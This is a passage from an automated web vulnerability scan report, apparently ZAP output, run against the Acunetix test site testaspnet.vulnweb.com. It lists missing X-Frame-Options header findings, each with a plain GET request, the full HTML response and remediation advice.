          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

  3. Risk=Medium, Confidence=Medium (26)

    1. http://testaspnet.vulnweb.com (26)

      1. X-Frame-Options Header Not Set (26)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          The HTTP response does not include the X-Frame-Options header, which protects against 'ClickJacking' attacks.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
